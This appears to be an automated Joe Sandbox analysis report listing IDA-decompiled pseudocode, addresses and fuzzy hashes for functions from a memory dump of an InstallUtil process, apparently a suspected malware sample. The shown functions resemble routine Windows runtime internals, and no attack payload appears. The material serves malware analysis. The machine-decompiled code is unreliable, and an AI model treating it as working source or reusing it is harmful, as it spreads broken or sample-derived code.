			E01354257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x13a08d0);
				E0131D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E013541E8(__ebx, __edi, __ecx, _t39);
				E012DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x13b87e4;
					_t18 =  *0x13b87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x13b5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x13b87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x13b87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L012C7055(_t31 + 0xfffffff8);
								_t24 =  *0x13b87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x13b87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x13b5cd0;
				if( *0x13b5cd0 <= 0) {
					L012C7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x13b87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x13b87e8 = _t30;
						 *0x13b87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0131D0D1(L01354320());
			}

0x01354257
0x01354257
0x01354257
0x01354259
0x0135425e
0x01354263
0x01354265
0x01354273
0x01354278
0x0135427c
0x0135427f
0x01354281
0x01354287
0x013542d7
0x013542d7
0x013542da
0x0135428d
0x0135428d
0x0135428f
0x01354292
0x01354297
0x0135429c
0x013542a0
0x013542a6
0x013542a8
0x013542ae
0x013542b3
0x00000000
0x013542ba
0x013542ba
0x013542bf
0x013542c5
0x013542ca
0x013542cf
0x013542d0
0x00000000
0x013542d0
0x013542b3
0x00000000
0x013542a6
0x0135429c
0x013542dc
0x013542dc
0x013542e3
0x01354309
0x013542e5
0x013542e5
0x013542e8
0x013542ee
0x013542f0
0x00000000
0x013542f2
0x013542f2
0x013542f4
0x013542f7
0x013542f9
0x01354300
0x01354300
0x013542f0
0x0135430e
0x0135431f

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90b01452c35263a56d80b59058acd161642d887552256799ef8dfcfada70d5b
Instruction ID: 0cf876c44cca180158f196df3ff9e0d4d56b227f4734f532c8756a6090233c19
Opcode Fuzzy Hash: e90b01452c35263a56d80b59058acd161642d887552256799ef8dfcfada70d5b
Instruction Fuzzy Hash: 69215B70500605CFC7A9DF68D080A147BBDFF4575DF2182AEC6198B299FB319492CB40

Uniqueness

Uniqueness Score: -1.00%

Function 012F2397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E012F2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x13b848c != 0) {
					L012EFAD0(0x13b8610);
					if( *0x13b848c == 0) {
						E012EFA00(0x13b8610, _t19, _t27, 0x13b8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E012F2581(0x13b8610, 0x12a50a0, _t26, _t27, _t28);
						E012EFA00(0x13b8610, 0x12a50a0, _t27, 0x13b8610);
					}
				} else {
					L1:
					_t11 =  *0x13b8614; // 0x0
					if(_t11 == 0) {
						_t11 = E01304886(0x12a1088, 1, 0x13b8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E012F2581(0x13b8610, (_t11 << 4) + 0x12a5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x012f23b0
0x012f23b6
0x012f2409
0x012f2415
0x01335ae9
0x00000000
0x012f241b
0x012f241b
0x012f241d
0x012f2427
0x012f242e
0x012f2430
0x012f2430
0x012f23b8
0x012f23b8
0x012f23b8
0x012f23bf
0x012f23fc
0x012f23fc
0x012f23c1
0x012f23c3
0x012f23d0
0x012f23d8
0x012f23d8
0x012f23dc
0x012f23de
0x012f23e1
0x012f23e1
0x012f23ec

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fef41c9db5aa9d110da71e645af9eec2196d9dabb3c6f1c7bffda460aa95d05
Instruction ID: a56e6c086561369782b7afd6efd78ce269a06f44f903e60d6b9595bd4eee3f2e
Opcode Fuzzy Hash: 0fef41c9db5aa9d110da71e645af9eec2196d9dabb3c6f1c7bffda460aa95d05
Instruction Fuzzy Hash: 8D110472760301A7E730A629AC84B26F6DDEBA5720F54447EF702AB290DAB4E8458754

Uniqueness

Uniqueness Score: -1.00%

Function 013446A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E013446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0130F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E012FD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L012E77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x013446b7
0x013446ba
0x013446c5
0x013446c8
0x013446d0
0x013446d4
0x013446e6
0x013446e9
0x013446f4
0x013446ff
0x01344705
0x01344706
0x0134470c
0x01344713
0x0134471b
0x01344723
0x01344725
0x013446d6
0x013446d9
0x013446db
0x013446db
0x01344732

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: f670deea51a0c8e221a648d30b316cc404b13ad9797892de740bf8e8eaebcee5
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: BA110272504208BBCB059F5C98809BEBBF9EF95314F1080AAF944C7351DA319D51C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 013037F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E013037F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E012E2280(_t6, 0x13b8550);
				}
				_t29 = E0130387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E012DFFB0(0x13b8550, _t27, 0x13b8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x013037fa
0x013037fc
0x01303805
0x01303808
0x01303808
0x01303814
0x01303818
0x01303846
0x01303848
0x0130384b
0x0130384b
0x01303852
0x00000000
0x01303854
0x01303856
0x00000000
0x00000000
0x01303863
0x00000000
0x01303863
0x0130381a
0x0130381a
0x0130381f
0x0130386e
0x0130386e
0x01303871
0x01303873
0x01303873
0x01303868
0x00000000
0x01303868
0x01303821
0x01303826
0x00000000
0x00000000
0x01303828
0x0130382a
0x01303841
0x00000000
0x01303841

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97cdc4be945b7c1ca32c80d4ec8bfe63172322c18968d78c55efa8b8ec7c3ada
Instruction ID: 964543a1f33afdd48db49337468848aa1eea1bddfcabb9ffb267155af2d99aa1
Opcode Fuzzy Hash: 97cdc4be945b7c1ca32c80d4ec8bfe63172322c18968d78c55efa8b8ec7c3ada
Instruction Fuzzy Hash: 89012672A416219FC33B8B1ED960E27BFEAFF81B5471540E9E9058B681D730CA05C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 012F002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012F002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E012E7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E012E7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E012E7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E012E7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x012f0032
0x012f0037
0x012f0043
0x01334b3a
0x012f0049
0x012f0049
0x012f0049
0x012f004e
0x012f0053
0x01334b48
0x01334b5a
0x01334b4a
0x01334b53
0x01334b53
0x01334b5f
0x00000000
0x01334b61
0x00000000
0x01334b61
0x012f0059
0x012f0059
0x012f0060
0x01334b6f
0x01334b6f
0x012f0069
0x01334b83
0x00000000
0x00000000
0x01334b90
0x01334b9b
0x01334b9b
0x01334ba4
0x00000000
0x00000000
0x01334baa
0x00000000
0x012f006f
0x012f006f
0x00000000
0x012f006f
0x012f0069

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 5a9b6f193c6cc3477663e1ee3bc7123f0d458b63bc69798bdb04f328408e3dd5
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 51110432221686CFE727876CD948B35BBD5EF80758F0900F8EE44877A3E369D841C668

Uniqueness

Uniqueness Score: -1.00%

Function 012D766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E012D766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E012FF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E012FF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L012E4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x012d7672
0x012d767f
0x012d7689
0x012d76de
0x012d76de
0x012d768b
0x012d7691
0x012d7693
0x012d7697
0x00000000
0x012d7699
0x012d76a8
0x00000000
0x012d76aa
0x012d76ad
0x012d76b1
0x00000000
0x012d76b3
0x012d76b3
0x012d76b5
0x012d76ba
0x012d76bc
0x012d76bc
0x012d76c0
0x00000000
0x012d76c2
0x012d76ce
0x012d76ce
0x012d76c0
0x012d76b1
0x012d76a8
0x012d7697
0x012d76d9

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 87c6eab52e15002c337b249fbbe4ef13695aaa352060a9b757cc16125184c96c
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: B0018833720119AFD7209E5FCD45E6B7BADEB94A64F140538BE09CB250EA34DD0187E0

Uniqueness

Uniqueness Score: -1.00%

Function 012C9080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E012C9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x13b85ec;
				E012E2280(_t48, 0x13b85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E012DFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x13b538c; // 0x77576828
					if( *_t84 != 0x13b5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x139f6e8);
						E0131D0E8(0x13b85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E013988F5(_t80, _t85, 0x13b5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x13b86c0; // 0xe607b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x13b86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E012E2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E013988F5(0x13b85ec, _t85, 0x13b5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0130AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x13bb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x13b84c0;
																			if(_t82 >=  *0x13b84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01399063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E012C922A(_t99);
										_t64 = E012E7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01398B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x13b86c0; // 0xe607b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x13b86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x13b86bc;
													_t87 = 0x13b86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E012C9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x13b86c4;
												_t87 = 0x13b86c0;
												L27:
												E012F9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0131D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x13b5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x13b538c = _t51;
						goto L6;
					}
				}
			}

0x012c9082
0x012c9083
0x012c9084
0x012c9085
0x012c9087
0x012c9096
0x012c9098
0x012c9098
0x012c909e
0x012c90a8
0x012c90e7
0x012c90e7
0x012c90aa
0x012c90b0
0x012c90b7
0x012c90bd
0x012c90dd
0x012c90e6
0x012c90bf
0x012c90bf
0x012c90c7
0x012c90cf
0x012c90f1
0x012c90f2
0x012c90f4
0x012c90f5
0x012c90f6
0x012c90f7
0x012c90f8
0x012c90f9
0x012c90fa
0x012c90fb
0x012c90fc
0x012c90fd
0x012c90fe
0x012c90ff
0x012c9100
0x012c9102
0x012c9107
0x012c910c
0x012c9110
0x012c9113
0x012c9115
0x012c9136
0x012c913f
0x012c9143
0x013237e4
0x013237e4
0x012c9117
0x012c9117
0x012c911d
0x00000000
0x012c911f
0x012c911f
0x012c9125
0x00000000
0x012c9127
0x012c912d
0x012c9130
0x012c9134
0x012c9158
0x012c915d
0x012c9161
0x012c9168
0x01323715
0x012c916e
0x012c916e
0x012c9175
0x012c9177
0x012c917e
0x012c917f
0x012c9182
0x012c9182
0x012c9187
0x012c9187
0x012c918a
0x012c918d
0x012c918f
0x012c9192
0x012c9195
0x012c9198
0x012c9198
0x012c9198
0x012c919a
0x00000000
0x00000000
0x0132371f
0x01323721
0x01323727
0x0132372f
0x01323733
0x01323735
0x01323738
0x0132373b
0x0132373d
0x01323740
0x00000000
0x01323746
0x01323746
0x01323749
0x00000000
0x0132374f
0x0132374f
0x01323751
0x01323757
0x01323759
0x0132375c
0x0132375c
0x0132375e
0x0132375e
0x01323761
0x01323764
0x00000000
0x00000000
0x01323766
0x01323768
0x013237a3
0x013237a3
0x013237a5
0x013237a7
0x013237ad
0x013237b0
0x013237b2
0x013237bc
0x013237c2
0x013237c2
0x013237b2
0x012c9187
0x012c9187
0x012c918a
0x012c918d
0x012c918f
0x012c9192
0x012c9195
0x00000000
0x012c9195
0x00000000
0x0132376a
0x0132376a
0x0132376a
0x0132376c
0x0132376c
0x0132376f
0x01323775
0x00000000
0x00000000
0x01323777
0x01323779
0x01323782
0x01323787
0x01323789
0x01323790
0x01323790
0x0132378b
0x0132378b
0x0132378b
0x01323792
0x01323795
0x00000000
0x01323795
0x00000000
0x01323779
0x01323798
0x00000000
0x01323798
0x00000000
0x01323768
0x0132379b
0x0132379b
0x01323751
0x01323749
0x00000000
0x01323740
0x012c91a0
0x012c91a3
0x012c91a9
0x012c91b0
0x00000000
0x012c91b0
0x012c9187
0x012c91b4
0x012c91b4
0x012c91bb
0x012c91c0
0x012c91c5
0x012c91c7
0x013237da
0x012c91cd
0x012c91cd
0x012c91cd
0x012c91d2
0x012c91d5
0x012c9239
0x012c9239
0x012c91d7
0x012c91db
0x012c91e1
0x012c91e7
0x012c91fd
0x012c9203
0x012c921e
0x012c9223
0x00000000
0x012c9205
0x012c9205
0x012c9208
0x012c920c
0x012c9214
0x012c9214
0x012c920c
0x012c91e9
0x012c91e9
0x012c91ee
0x012c91f3
0x012c91f3
0x012c91f3
0x012c91e7
0x00000000
0x00000000
0x00000000
0x012c9134
0x012c9125
0x012c911d
0x012c914e
0x012c90d1
0x012c90d1
0x012c90d3
0x012c90d6
0x012c90d8
0x00000000
0x012c90d8
0x012c90cf

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7944c518827a9fa34157e30335168dac65b10f9319ba95b7f050d5878b8b175
Instruction ID: 34cf85b0484e47565adc38f99e3db06ae230027b0783f3bea337d46505ef870d
Opcode Fuzzy Hash: f7944c518827a9fa34157e30335168dac65b10f9319ba95b7f050d5878b8b175
Instruction Fuzzy Hash: 2301F472521205CFC7258F08D880B217BADEF41B29F25416AE3058B791D370DC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0135C450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0135C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01309910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E013095B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E013095D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E013095D0();
				return L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0135c458
0x0135c45d
0x0135c466
0x0135c468
0x0135c469
0x0135c46a
0x0135c46b
0x0135c46e
0x0135c46f
0x0135c471
0x0135c476
0x0135c476
0x0135c47c
0x0135c47e
0x0135c480
0x0135c480
0x0135c483
0x0135c484
0x0135c486
0x0135c488
0x0135c48f
0x0135c491
0x0135c493
0x0135c493
0x0135c48f
0x0135c498
0x0135c49e
0x0135c4ad
0x0135c4ad
0x0135c4b2
